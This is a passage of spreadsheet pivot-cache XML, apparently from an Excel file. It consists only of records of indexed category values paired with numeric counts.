    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="55"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="55"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="110"/>
    <x v="55"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="55"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="55"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="56"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="3"/>
    <x v="56"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="6"/>
    <x v="56"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="3"/>
    <x v="56"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="56"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="56"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="56"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="56"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="56"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="56"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="56"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="56"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="56"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="56"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="57"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="57"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="57"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="57"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="57"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="57"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="57"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="57"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="57"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="57"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="57"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="57"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="57"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="57"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="58"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="58"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="5"/>
    <x v="58"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="58"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="58"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="58"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="58"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="58"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="58"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="58"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="58"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="58"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="58"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="58"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="59"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="59"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="59"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="59"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="59"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="59"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="59"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="59"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="59"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="59"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="40"/>
    <x v="59"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="65"/>
    <x v="59"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="59"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="59"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="59"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="59"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="60"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="60"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="60"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="60"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="60"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="60"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="60"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="60"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="60"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="60"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="60"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="60"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="60"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="60"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="61"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="61"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="61"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="61"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="61"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="61"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="61"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="61"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="61"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="61"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="61"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="61"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="61"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="61"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="62"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="62"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="62"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="62"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="62"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="62"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="62"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="62"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="62"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="62"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="62"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="62"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="62"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="62"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="63"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="63"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="63"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="63"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="63"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="63"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="63"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="63"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="63"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="63"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="63"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="63"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="63"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="63"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="64"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="64"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="64"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="64"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="64"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="64"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="64"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="64"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="64"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="64"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="64"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="64"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="64"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="64"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="65"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="65"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="65"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="65"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="65"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="65"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="65"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="65"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="65"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="7"/>
    <x v="65"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="65"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="72"/>
    <x v="65"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="65"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="65"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="66"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="66"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="66"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="2"/>
    <x v="66"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="66"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="66"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="66"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="66"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="10"/>
    <x v="66"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="66"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="66"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="66"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="66"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="66"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="67"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="67"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="67"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="67"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="67"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="67"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="67"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="67"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="67"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="67"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="67"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="67"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="67"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="67"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="68"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="68"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="68"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="68"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="68"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="68"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="68"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="68"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="68"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="68"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="60"/>
    <x v="68"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="95"/>
    <x v="68"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="68"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="68"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="69"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="69"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="69"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="69"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="69"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="69"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="27"/>
    <x v="69"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="69"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="69"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="69"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="69"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="69"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="69"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="69"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="70"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="70"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="70"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="70"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="70"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="70"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="70"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="20"/>
    <x v="70"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="70"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="70"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="70"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="70"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="70"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="70"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="71"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="72"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="72"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="72"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="72"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="72"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="72"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="72"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="72"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="72"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="72"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="72"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="72"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="72"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="72"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="73"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="73"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="73"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="73"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="73"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="73"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="73"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="73"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="73"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="73"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="73"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="73"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="73"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="73"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="74"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="74"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="74"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="74"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="74"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="74"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="74"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="74"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="74"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="74"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="74"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="74"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="8"/>
    <x v="74"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="74"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="75"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="75"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="9"/>
    <x v="75"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="75"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="75"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="75"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="75"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="75"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="75"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="75"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="75"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="75"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="75"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="75"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="76"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="76"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="76"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="76"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="76"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="76"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="76"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="76"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="76"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="76"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="76"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="16"/>
    <x v="76"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="76"/>
  </r>
  <r>
